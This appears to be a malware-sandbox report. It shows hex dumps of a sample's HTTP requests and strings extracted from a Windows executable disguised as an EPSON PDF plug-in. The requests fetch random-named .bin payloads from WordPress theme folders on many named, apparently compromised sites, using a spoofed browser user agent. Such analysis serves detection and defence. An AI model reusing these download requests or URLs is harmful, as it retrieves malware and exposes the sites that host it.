0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a20636c 65726b74   7)..Host: clerkt
0x000000a0 (00160)   6f676f76 65726e6f 72732e63 6f2e756b   ogovernors.co.uk
0x000000b0 (00176)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f77 68663379 71346e38 36716533   ht/whf3yq4n86qe3
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a206672 65656b69   7)..Host: freeki
0x000000a0 (00160)   64737669 64656f73 2e6e6574 0d0a4361   dsvideos.net..Ca
0x000000b0 (00176)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000c0 (00192)   63616368 650d0a0d 0a0d0a0d 0a         cache........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f33 35306738 74342e62 696e2048   ht/350g8t4.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 626c6f67 2e6d6172   ..Host: blog.mar
0x000000a0 (00160)   69616e69 73656c2e 636f6d0d 0a436163   ianisel.com..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 0a0d0a0d 0a         ache.........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f32 39757473 35687a74 72352048   ht/29uts5hztr5 H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 64657369 676e6279   ..Host: designby
0x000000a0 (00160)   7468656d 652e636f 6d0d0a43 61636865   theme.com..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a0d0a 0a0d0a0d 0a         he...........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6a 61727261 682f3379   themes/jarrah/3y
0x00000020 (00032)   6a6b7664 75742e62 696e2048 5454502f   jkvdut.bin HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000080 (00128)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x00000090 (00144)   73743a20 7777772e 6772656b 69736b61   st: www.grekiska
0x000000a0 (00160)   666f7265 6e696e67 656e2e63 6f6d0d0a   foreningen.com..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a0d0a0d 0a         o-cache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6b 74773478 32692e62 696e2048   ht/ktw4x2i.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 62657468 70657465   ..Host: bethpete
0x000000a0 (00160)   72732e6e 65740d0a 43616368 652d436f   rs.net..Cache-Co
0x000000b0 (00176)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000c0 (00192)   0a0d0a61 6368650d 0a0d0a0d 0a         ...ache......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f68 6c6b6139 6a383166 20485454   ht/hlka9j81f HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000050 (00080)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000060 (00096)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000070 (00112)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000080 (00128)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x00000090 (00144)   486f7374 3a206461 6e69656c 66657272   Host: danielferr
0x000000a0 (00160)   69732e63 6f6d2e61 750d0a43 61636865   is.com.au..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a650d 0a0d0a0d 0a         he....e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f6f 63336461 20485454 502f312e   ht/oc3da HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207374 7061756c 6d617962 65652e6f   : stpaulmaybee.o
0x000000a0 (00160)   72670d0a 43616368 652d436f 6e74726f   rg..Cache-Contro
0x000000b0 (00176)   6c3a206e 6f2d6361 6368650d 0a0d0a63   l: no-cache....c
0x000000c0 (00192)   68650d0a 0d0a650d 0a0d0a0d 0a         he....e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f63 6c617373 69632f67   themes/classic/g
0x00000020 (00032)   34337a6e 37366e30 31636820 48545450   43zn76n01ch HTTP
0x00000030 (00048)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000040 (00064)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000050 (00080)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000060 (00096)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000070 (00112)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000080 (00128)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000090 (00144)   6f73743a 20626261 6c6c2d6b 65796d61   ost: bball-keyma
0x000000a0 (00160)   6e2e6e65 740d0a43 61636865 2d436f6e   n.net..Cache-Con
0x000000b0 (00176)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x000000c0 (00192)   0d0a0d0a 0d0a650d 0a0d0a0d 0a         ......e......

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f62 77363974 20485454 502f312e   ht/bw69t HTTP/1.
0x00000030 (00048)   310d0a55 7365722d 4167656e 743a204d   1..User-Agent: M
0x00000040 (00064)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000050 (00080)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000060 (00096)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000070 (00112)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x00000080 (00128)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x00000090 (00144)   3a207669 72616368 65792e63 6f6d0d0a   : virachey.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a63 68650d0a   o-cache....che..
0x000000c0 (00192)   0d0a0d0a 0d0a650d 0a0d0a0d 0a         ......e......

0x00000000 (00000)   47455420 2f2f7770 2d636f6e 74656e74   GET //wp-content
0x00000010 (00016)   2f746865 6d65732f 6c696768 74776569   /themes/lightwei
0x00000020 (00032)   6768742f 396d6c6d 6b6d7379 78797572   ght/9mlmkmsyxyur
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a20636c 65726b74   7)..Host: clerkt
0x000000a0 (00160)   6f676f76 65726e6f 72732e63 6f2e756b   ogovernors.co.uk
0x000000b0 (00176)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000c0 (00192)   206e6f2d 63616368 650d0a0d 0a          no-cache....

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f77 68663379 71346e38 36716533   ht/whf3yq4n86qe3
0x00000030 (00048)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000040 (00064)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000050 (00080)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000060 (00096)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000070 (00112)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000080 (00128)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000090 (00144)   37290d0a 486f7374 3a206672 65656b69   7)..Host: freeki
0x000000a0 (00160)   64737669 64656f73 2e6e6574 0d0a4361   dsvideos.net..Ca
0x000000b0 (00176)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000c0 (00192)   63616368 650d0a0d 0a0d0a0d 0a         cache........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f33 35306738 74342e62 696e2048   ht/350g8t4.bin H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 626c6f67 2e6d6172   ..Host: blog.mar
0x000000a0 (00160)   69616e69 73656c2e 636f6d0d 0a436163   ianisel.com..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 0a0d0a0d 0a         ache.........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6c 69676874 77656967   themes/lightweig
0x00000020 (00032)   68742f32 39757473 35687a74 72352048   ht/29uts5hztr5 H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000050 (00080)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000060 (00096)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000070 (00112)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000080 (00128)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x00000090 (00144)   0d0a486f 73743a20 64657369 676e6279   ..Host: designby
0x000000a0 (00160)   7468656d 652e636f 6d0d0a43 61636865   theme.com..Cache
0x000000b0 (00176)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000c0 (00192)   68650d0a 0d0a0d0a 0a0d0a0d 0a         he...........

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   7468656d 65732f6a 61727261 682f3379   themes/jarrah/3y
0x00000020 (00032)   6a6b7664 75742e62 696e2048 5454502f   jkvdut.bin HTTP/
0x00000030 (00048)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000040 (00064)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000050 (00080)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000060 (00096)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000070 (00112)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000080 (00128)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x00000090 (00144)   73743a20 7777772e 6772656b 69736b61   st: www.grekiska
0x000000a0 (00160)   666f7265 6e696e67 656e2e63 6f6d0d0a   foreningen.com..
0x000000b0 (00176)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000c0 (00192)   6f2d6361 6368650d 0a0d0a0d 0a         o-cache......


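Strings (printable strings extracted from the sample; the short random-looking entries are most likely noise from compressed or encrypted data, and the SEIKO EPSON version-info fields are unverified metadata, not evidence of the file's real origin)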
141804b0
3.9.0.0
{8856F961-340A-11D0-A96B-00C04FD705A2}
Bold
Check out it in live application: Tray Helper :)
CompanyName
Copyright (C) SEIKO EPSON CORP. 2002 
%d.%d.%d
%d,%d,%d,%d,%s,%s,%s
Eppdfres.dll
EPSON PDF Plug-in
FileDescription
FileVersion
Get HTML
HtmlEditor
http://www.codeguru.com
Hyperlink
Insert image
Italic
kernel32.dll
LegalCopyright
MS Sans Serif
OriginalFilename
ProductName
ProductVersion
Redo
SEIKO EPSON CORP.
Show source
%%%%%s^^%%%%%s^^%%%%%d^^%%%%%d^^%%%%%d^^%%%%%d^^%%%%%d^^%%%%%d^^%%%%%d^^%%%%%d^^**
StringFileInfo
Translation
Underline
Undo
VarFileInfo
VS_VERSION_INFO
)@*[$|
000DqZO
000Dr[O
0#4tJ`tAm
08/05/14
1Dto:?
+1+e+?
1f:+$C=
1I2pc|N
1QB9ZI:
21QiHdNy
222Br[O
23e7>Y
2&$AO{byz
\2,t-|
2+t+A+
3:~00{
34[T*\
36Pb*)
3qR#E"4
3sl|$V
3xb=oC
4"'33Me
444DqZP
444Dr^V
444Dtqp
44!+i_j
]{{47/
4BY"h( 
}4'K<6
4orWa2
4QOyAJw
?(5NPr#]
5nS)4m
5PRich
..6#{9
6c[&LQ
6+fbDAg
///6o\Q
6/o<TviH=
6V'fvW
+6YDPUIZ,
7C`~B8
7_Df.l
7ExI3q
7nl>wz
7>XsA`
`]80Z/p(
'	8=5q
888Dvvv
888Dwww
888Dzzz
8c_U;'
8-*	H,
%8JCH@
+|_8$M
'8-'Wt}N
9!2~#-
~9*4[1?
$9a]|W
9c1E g<
9fS5Uq
9]iLY1V
9lz2O(r!
9(SU<E
9X};R]f
9Ya1sQ
<ab)04
_adjust_fdiv
Adobe Fireworks CS4
ADVAPI32.dll
%AHe^8
$aNfdo
#|aNf!j
*A<p?h+
aplLQ%pe+
>{aPqD
A.r.i.a.l...L.i.n.e.i.n.e.t.i...A.r.i.a.l.b.....B.o.l.l.T.e.c.h.r.o.u.n.d...C.o.p.y.p.a.s.t.e...f.o.r...m.y.m.y.a.p.p...e.x.e
a!,T/>+a+
		.Av~
/Aw5^r
@+]+b+b
BF N1N
b-gUG)
&bHOSb
b#i41j
bLC@1z
-BL'!,?rA
bM1\!E
,|b}mc
	(bW~R
B.Z os
c@? >,
+c2V|6&
Chd${!
CJ,WaL3N
c=k.9\
c&lU{3
C{@m;4J
C?N?j:
_controlfp
CORxkt
CreateFileW
<CUUe5
&C(vc-
CWebBrowser2
__CxxFrameHandler
<<<D~~~
<<<D|||
<<<D{{{
D]	}$&
*.D	0t
D4OM{n
d]6JxJ%
@.data
DBxDnW
=}Df~_\h7M
D}/iJb
' }"D#J
__dllonexit
)|<^dm:
dN\i=	B
Dnzp,^F
`dr|2y6_
e3qf`a
E4zJvP
e5QVbb
+e+c' 
edg\i8
-<@<EJ
EnableWindow
EX9;$(
_except_handler3
*/{ey@
e*y,3G
,&e` Z
--ez f
^'F( ]
f6rmJ 
F,a7mN+
fclose
FFh](T"
F+g+"+
'fh?D7
fKSmFu
fN8.X#S
fPPxt'#[
FpWmimBR5/
f[V}5IP^
fxFdkIU
fYECJ_P
,G73z-
g8P|K)
G(cOH>
g,Dp~j
GetModuleFileNameW
GetModuleHandleW
GetProcAddress
GetStartupInfoW
GkP}"=]
#gNI1&
'`	g~x
g`^)x/;
]!Gya&C
~gzcUkb
H9eYL3$
$hAyWI
`{Hb#Q
_H`c [T
)Hefo4
HH`7\Z
HHHHHHH
HN /C*
hn(l	>oV
>HpK=H
HSKui0
h-uc5.
'H-wSI
I05)/N
_i}@*6
ibnN-"7=
)iCOdjm4
iCO?gr
iI-K&.
%ijZ<c
_initterm
|@iP'G
I$`!SQI
IsTextUnicode
@)%J }
J&31S*h
JB,zsEK
%jd<>c
JeA/t#$
~JE!z3
`<jGum
"##'jj
JJ*qJ{
!j`K=M
	J#:)L#k
,j/N5R
Jn5w6tVuv%
 jNF%A
]jOa%L[Q
J!P !~
J`PTEd
JTfB"n
jTfq7^
jUd5cJ
,]|*juL4c
J@wuU[06
K$bhMQd
kEHL|;D
kernel32.dll
KERNEL32.dll
@-KEX@
kjyW}*
~KoS9FZP<
<kw]T9
k,:#X<|
kZsVA\<
L8epmt
L9Ae['j
la_.;g
Lc:5/9
Lf+P-@
l.g07)
LHwEa)
L\IL7Gt
lisPc#
lkF3G2
LLLLLL
lM*pGf\(!
`\"\LN
LoadIconW
LoadLibraryA
L_}O`g}S.
`}:"LVH
,%/l+,+Y]4
}|m&${
[$M?3w
Ma0@&Y
memcpy
memset
MessageBoxW
MFC42u.DLL
MIs_ j
MjRUD;
	mmfRV
Mm&I?7
MmT3zR
:mog=v
MSVCRT
MultiByteToWideChar
*mX2{l
n+c+H+
N`^D}|
n:l4'%I
nLK{{!H
n>^Nd;
N+x+i+
o3im@ge>
O.6<0<G
o~|7)z
	.oGjD
?oj+6Jh<
OLEAUT32.dll
_onexit
OO\4sp
/oOeaG
o'PYv%
o)ta=1
%~O@$u
oVJ{TQ
ov*uN*t6gF
(/oYlp
O#yu-8
P1Q1yj-
p{2(0$
P4rRNY
%p5n'K4o8I
P (	7s
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDI
NGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
__p__commode
P==ded_
p~Dj(9
pdWrG[
Pe:'zp
p{FH^<
pf kY?
__p__fmode
p/HC0i%t
$pIL9?vvq
/\p{kF
P&O:)%
P]oujg.
.p.p...e...............
Ps]Kx]
(PSttst
p{ w/+
-pX<#?
P<\x"4:
Px5FaC#
PxVI+:
PyD()	WWq,
///PYRM
@q;3}[
Q7jEq\
Q/~b _
q	;h,1
)q+,+^\%I
q+P- =
+Q+Q+]
$qsn\2
'qtSI{
#QU `A
qVt+MP
QWg6.?
qz&|tKka
R3jJ)Sqhn
%R&5N+fdS
r8c2@V
rB^N:#
`.rdata
rewind
rG1$fy!d
r[G*s[
-R_Gwc
rGyrYyh
r\&H5c2
rl6k]|
r nUV'0
|Rpn5D
rQCqey
rQ$#!G
rtnm*i6)
?{ry6L(
ry&eQf,
S3aZ>h
S3@|)?nk}
S)@7^}
 S+_7L
__set_app_type
__setusermatherr
 ShN]I!
+~si5g
s[i;:HP8
_snwprintf
s)pK;	*
Sq[ekb;
S<qh(*
SSS+iiiMuuu]ttt`ttt`ttt`ttt`ttt`ttt`ttt`ttt`rrrb
strncpy
StxtaVM
SUn&dAV
*+^+T+
T2|*#S
}t5ps]
+#+T+b
Tb}uE-
{T+coC
t_)dmSj&f#
tEXtCreation Time
tEXtSoftware
tgRY<?
!This program cannot be run in DOS mode.
Tj7]^:%
>tK6|I8
TN_`:]
tNy( (
Tp+)Fx
TsI.XrQ
TW8^/@
:tWXr}x
[]&tyJg
U]6=DL
UBnQ2?W
uHq+qi
ums7^	
...,[UO
 -UO~J
u$OkL%
U	-R}B
USER32.dll
uX4K1%n
: =V^(
	v\4mt
.>V5HW
VAyr;Ujdb
v@E+jw
_V+F t
VmN	oB!
vn{-a,1
Vpaj/.
V_Ph~2h4
V*PIFv
vpY!BG
v(	roH
\v sHJ
VSxTPWr1/
vUIZo=
VUU%w0O
V\V*C+
 .V$VS<
w2meNQ
]W-B2Q
wbT3QN
_wcmdln
wcscmp
W]$D+y
_wfopen
^.,w`G]
__wgetmainargs
WH/`'N
WMI^:Qk%
WM#lx`
'WN15xZ
!wOM"0v
+w+!+rY
WsZZaL
Wuds8;
;^w'wGU
Xa7k":
_XcptFilter
,	-XDv
XIiE5?	
x==Ky)
`XmQ7Zq	M7j
x}?r5(a
xSV:9J
xu=F%7=
X~y+9E
/XzV@"
)Y8U0R
yATbw#
}&y\gU
+y+$+J
Y m)xd
Ymy!pE
Yu4MOb
y&$*vz
z2:rX	
Z47&Jx
%"zcCg
Zd*n9<
Zf[^9,MC
Z~F+G,
 z\GoT
zg/#_TK
\~ZhAr
Z~isTc
Z=$\/l
Zl6unB
Z&wO?N8